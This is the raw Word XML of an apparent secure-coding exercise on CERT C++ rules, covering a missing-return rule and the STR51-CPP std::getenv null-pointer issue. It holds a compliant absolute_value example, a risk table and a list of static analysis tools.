                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>-a;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35842482" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E0C2F48" w14:textId="39EC9AE9" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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ACFBCF" w:rsidR="00F72634" w:rsidRDefault="00A1232C" w:rsidP="0015146B">
            <w:r>
              <w:t>All code paths return a value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="71761811" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="68C48665" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>absolute_value(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>a) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5664B41F" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(a &lt; 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705EE486" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>    </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>-a;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0371CBAA" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9EEA49" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>a;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4DA9C0" w14:textId="67E01526" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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235484B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE61A97" w14:textId="2D811BAD" w:rsidR="00953D20" w:rsidRDefault="00953D20" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(9) Use Effective Quality Assurance Techniques</w:t>
            </w:r>
            <w:r w:rsidR="00027E4C">
              <w:t>- Incorporating good quality assurance techniques such as source code audits can help developers find issues such as the one presented in the noncompliant code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770D7F02" w14:textId="3E35B4C8" w:rsidR="00953D20" w:rsidRDefault="00953D20" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(2) Heed Compiler Warnings-</w:t>
            </w:r>
            <w:r w:rsidR="00027E4C">
              <w:t xml:space="preserve"> If a warning should appear to let the developer know that not all code paths can return a value, the developer should take note and modify the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3B607E6" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="086FA0F7" w14:textId="7425AEC5" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D7EE5AB" w14:textId="53BF00E4" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483DB358" w14:textId="75E81462" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0216068C" w14:textId="0A9609D2" w:rsidR="00B475A1" w:rsidRDefault="00F829BC"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726C89C" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Astree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A2ABA7F" w14:textId="2B3CC633" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4441551B" w14:textId="0160C8E1" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>return-implicit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196AC4C7" w14:textId="3466070E" w:rsidR="00B475A1" w:rsidRDefault="00F829BC"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1EAE5396" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Axivion Bauhaus Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70D2F7C5" w14:textId="26C26D05" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68783DFF" w14:textId="5C8FDCBD" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CertC++-MSC52</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67EF3C2C" w14:textId="1614246A"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4C4CDA94" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>RuleChecker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5109F248" w14:textId="54018D16" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A09A96" w14:textId="0EA63A19" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>return-implicit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D572B94" w14:textId="0DF99D05" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Fully checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="7B57D6C5" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0880DBB9" w14:textId="3EC37D31" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>LDRA tool suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="527A0ABE" w14:textId="3FABA874" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EFB0041" w14:textId="7D8224BF" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>2 D, 36 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E45804C" w14:textId="0D388F1D" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w: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FAD8715" w:rsidR="00381847" w:rsidRDefault="00167423">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>STR51-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E7240A9" w14:textId="1133462D" w:rsidR="00381847" w:rsidRDefault="00167423">
            <w:r w:rsidRPr="00167423">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D39F735" w:rsidR="00F72634" w:rsidRDefault="00533084" w:rsidP="0015146B">
            <w:r>
              <w:t>The std::string object is created from the results of a call to std::getenv() which returns a null pointer on failure; this can cause undefined behavior if the environment variable does not exist.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="6EF6786D" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7506C968"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstdlib&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="206994EB"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D82B1D9"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69ED8754"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586D95E1"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
